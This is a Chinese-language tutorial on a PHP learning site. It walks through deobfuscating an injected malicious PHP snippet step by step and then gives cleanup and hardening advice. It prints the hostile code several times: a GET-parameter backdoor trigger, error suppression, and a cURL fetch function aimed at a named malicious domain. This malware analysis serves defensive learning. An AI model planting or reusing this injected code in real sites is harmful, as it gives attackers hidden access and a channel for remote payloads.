0

0

PHP 代码去混淆实践:恶意注入分析与清理指南

碧海醫心

碧海醫心

发布时间:2025-10-02 10:35:08

|

710人浏览过

|

来源于php中文网

原创

PHP 代码去混淆实践:恶意注入分析与清理指南

本教程旨在详细指导如何逐步去混淆一段复杂的 PHP 代码,该代码通过 URL 编码、字符串索引访问和混淆变量名等技术隐藏其真实意图。我们将解析其执行逻辑、潜在的恶意行为,并提供清晰的代码重构示例,帮助开发者理解并应对类似的 PHP 恶意代码注入。

PHP 恶意代码去混淆:逐步解析与安全实践

在 web 开发中,服务器被注入恶意代码是一种常见的安全威胁。这些恶意代码通常会经过混淆处理,以逃避检测并增加分析难度。本教程将以一个具体的 php 混淆代码片段为例,详细讲解如何一步步对其进行去混淆,揭示其真实功能,并探讨其潜在的安全风险。

1. 初始混淆代码分析

首先,我们来看这段被发现注入到服务器文件中的 PHP 代码片段:

<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); 
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

这段代码的特点是使用了大量难以阅读的变量名(如 $OOOOOO、$oOooOOoO 等),以及通过字符串索引(如 $O{21})来构建新的字符串,这使得代码的真实意图变得模糊。error_reporting(0) 旨在抑制所有错误报告,进一步隐藏其行为。

2. 逐步去混淆

去混淆过程需要耐心和细致,我们将按照以下步骤进行:

2.1 解码 $OOOOOO 变量

代码的第一步是将 $OOOOOO 变量进行 URL 解码,并赋值给全局变量 $O。这是去混淆的关键第一步,因为它定义了后续所有字符串构建的基础字符集。

立即学习PHP免费学习笔记(深入)”;

$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);

// 解码后,$O 的内容如下:
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";

这个字符串包含了英文字母(大小写)、数字、特殊符号等,看起来像是键盘上的字符顺序排列。

2.2 替换字符串索引访问

接下来,代码中大量使用了 $O{x} 这种(在 PHP 7.4+ 中已弃用,但在旧版本中有效)的字符串索引访问方式来获取单个字符并拼接成新的字符串。我们需要将所有这些 $O{x} 表达式替换为其对应的实际字符。

例如,$O{21} 对应 $O 字符串中的第22个字符(索引从0开始),即 'c'。

Amazon Nova
Amazon Nova

亚马逊云科技(AWS)推出的一系列生成式AI基础模型

下载

经过替换后,代码片段将变为:

if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

2.3 合并字符串字面量

为了提高可读性,我们可以将通过 . 运算符连接的字符串字面量合并成一个完整的字符串。

if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}

2.4 变量重命名与代码格式化

最后一步是重命名那些混淆的变量,使其具有描述性,并对代码进行格式化,使其更符合标准的可读性规范。同时,将长行代码拆分成多行,提高清晰度。

if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("<?php",$thisFileSource);
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; 

function sendRequest($targetUrl){
    $curlHandle=curl_init();
    curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
    curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curlHandle);
    curl_close($curlHandle);
    return $result; 
}

3. 代码功能分析与潜在风险

去混淆后的代码揭示了其主要功能:

  1. 条件执行检查: 代码首先检查 $_GET 参数中是否存在 chen 键,并且其值是否为 51-cn。如果条件满足,则执行后续逻辑。这通常是一个后门或特定触发机制。

  2. 文件内容自检: 如果条件满足,代码会读取当前文件(__FILE__)的全部内容,然后以 <?php 作为分隔符将其分割成数组 $parts。 接着,它检查 $parts 数组的第二个元素(即第一个 <?php 标签之后的所有代码)是否包含 %71%77%65 这个字符串(URL解码后为 qwe)。

    • 如果包含,则输出 [ok!] 并退出。
    • 如果不包含,则输出 [fail!] 并退出。

    分析: 这种自检机制看起来有些多余,因为如果代码本身不存在,它就不会运行。如果存在,它总会包含 %71%77%65 (即 $OOOOOO 变量的开头部分)。这可能是为了验证代码的完整性或作为某种调试/确认机制。

  3. 外部请求函数定义: 代码定义了一个名为 sendRequest (原 ooooooooOOOOOOOOoooooOOO) 的函数,该函数使用 cURL 库向指定的 URL 发送 GET 请求,并返回响应内容。 同时,它构建了一个 URL http://z0807_1.agoods.top,但在这个代码片段中,该 URL 并没有被 sendRequest 函数实际调用。

    潜在风险:

    • 未执行的外部请求: 虽然 sendRequest 函数和目标 URL 被定义了,但在这个片段中并未被调用。这强烈暗示在服务器上可能存在其他被注入的代码,会调用这个函数,或者这个片段本身只是一个更大恶意脚本的一部分。攻击者通常会通过这种方式从远程服务器获取更多恶意内容,例如广告、重定向脚本、钓鱼页面或更高级的恶意负载。
    • 域名 agoods.top: 对 agoods.top 域名的调查显示,它与许多被劫持的网站和恶意活动相关,例如强制用户重定向到虚假的“浏览器更新”页面。这进一步证实了这段代码的恶意性质。
    • error_reporting(0): 禁用错误报告是恶意代码的典型特征,旨在避免在执行过程中暴露任何错误信息,从而隐藏其存在和行为。

4. 防范与清理建议

  • 立即隔离: 如果发现此类代码,应立即将受感染的服务器或文件隔离,防止进一步传播或损害。
  • 完整扫描与清理: 对服务器进行全面的恶意软件扫描,查找所有被注入的文件。手动检查所有 PHP 文件,特别是入口文件、公共函数库以及经常被修改的文件。
  • 日志分析: 检查 Web 服务器(如 Apache/Nginx)和 PHP 错误日志,寻找异常请求模式、可疑的 IP 地址或文件访问记录。
  • 更新与打补丁: 确保所有软件(操作系统、Web 服务器、PHP 版本、CMS 系统及插件)都更新到最新版本,并应用所有安全补丁。
  • 强化安全配置:
    • 禁用不必要的 PHP 函数(如 eval、shell_exec、system 等)。
    • 限制文件上传权限和执行权限。
    • 使用 Web 应用防火墙 (WAF) 过滤恶意请求。
    • 定期备份数据。
  • 代码审计: 定期对网站代码进行安全审计,查找潜在的漏洞和恶意注入点。
  • 密码安全: 更改所有服务器和数据库密码,确保使用强密码。

总结

去混淆恶意 PHP 代码是识别和应对 Web 安全威胁的关键步骤。通过本文的逐步解析,我们可以看到,即使是看似复杂的混淆代码,通过系统性的分析也能揭示其真实面目。这段代码不仅包含一个用于触发的后门条件,还定义了一个用于外部通信的 cURL 函数,并指向一个已知的恶意域名。理解这些恶意机制有助于我们更好地防范未来的攻击,并采取有效的清理措施来保护服务器和用户数据。

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

WorkBuddy
WorkBuddy

腾讯云推出的AI原生桌面智能体工作台

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
nginx 重启
nginx 重启

nginx重启对于网站的运维来说是非常重要的,根据不同的需求,可以选择简单重启、平滑重启或定时重启等方式。本专题为大家提供nginx重启的相关的文章、下载、课程内容,供大家免费下载体验。

248

2023.07.27

nginx 配置详解
nginx 配置详解

Nginx的配置是指设置和调整Nginx服务器的行为和功能的过程。通过配置文件,可以定义虚拟主机、HTTP请求处理、反向代理、缓存和负载均衡等功能。Nginx的配置语法简洁而强大,允许管理员根据自己的需要进行灵活的调整。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

522

2023.08.04

nginx配置详解
nginx配置详解

NGINX与其他服务类似,因为它具有以特定格式编写的基于文本的配置文件。本专题为大家提供nginx配置相关的文章,大家可以免费学习。

610

2023.08.04

tomcat和nginx有哪些区别
tomcat和nginx有哪些区别

tomcat和nginx的区别:1、应用领域;2、性能;3、功能;4、配置;5、安全性;6、扩展性;7、部署复杂性;8、社区支持;9、成本;10、日志管理。本专题为大家提供相关的文章、下载、课程内容,供大家免费下载体验。

244

2024.02.23

nginx报404怎么解决
nginx报404怎么解决

当访问 nginx 网页服务器时遇到 404 错误,表明服务器无法找到请求资源,可以通过以下步骤解决:1. 检查文件是否存在且路径正确;2. 检查文件权限并更改为 644 或 755;3. 检查 nginx 配置,确保根目录设置正确、没有冲突配置等等。本专题为大家提供相关的文章、下载、课程内容,供大家免费下载体验。

716

2024.07.09

Nginx报404错误解决方法
Nginx报404错误解决方法

解决方法:只需要加上这段配置:try_files $uri $uri/ /index.html;即可。想了解更多Nginx的相关内容,可以阅读本专题下面的文章。

3619

2024.08.07

nginx部署php项目教程汇总
nginx部署php项目教程汇总

本专题整合了nginx部署php项目教程汇总,阅读专题下面的文章了解更多详细内容。

56

2026.01.13

nginx配置文件详细教程
nginx配置文件详细教程

本专题整合了nginx配置文件相关教程详细汇总,阅读专题下面的文章了解更多详细内容。

72

2026.01.13

TypeScript类型系统进阶与大型前端项目实践
TypeScript类型系统进阶与大型前端项目实践

本专题围绕 TypeScript 在大型前端项目中的应用展开,深入讲解类型系统设计与工程化开发方法。内容包括泛型与高级类型、类型推断机制、声明文件编写、模块化结构设计以及代码规范管理。通过真实项目案例分析,帮助开发者构建类型安全、结构清晰、易维护的前端工程体系,提高团队协作效率与代码质量。

49

2026.03.13

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PHP课程
PHP课程

共137课时 | 13.6万人学习

JavaScript ES5基础线上课程教学
JavaScript ES5基础线上课程教学

共6课时 | 11.3万人学习

PHP新手语法线上课程教学
PHP新手语法线上课程教学

共13课时 | 1.0万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号